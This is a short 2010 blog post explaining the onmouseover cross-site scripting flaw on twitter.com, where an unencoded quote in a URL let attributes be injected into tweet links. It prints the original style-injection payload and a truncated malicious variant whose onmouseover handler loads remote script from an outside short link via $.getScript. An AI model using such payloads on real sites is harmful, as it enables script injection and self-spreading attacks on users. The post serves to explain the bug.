
XSS vulnerability on twitter.com

So Judofyr found an XSS exploit on Twitter.com, and within minutes it spread like wildfire. His original tweet only set the anchor's background and text colour to black, but his next tweet included an onmouseover handler, and people could not stop moving their mouse over the tweet, resulting in over 40,000 tweets within 10 minutes.

The exploit: http://judofyr.net/@"style="background:#000;color:#000;/

So Twitter does not HTML-encode the URL before putting it into the anchor's href attribute. The `"` in the URL closes the attribute, and whatever follows the @ is emitted as further attributes on the anchor tag. That means both CSS (a style attribute) and JavaScript (an event handler such as onmouseover) can be injected.

Shortly after, someone else created a more malicious version:

http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A ...

Written on 21 September 2010.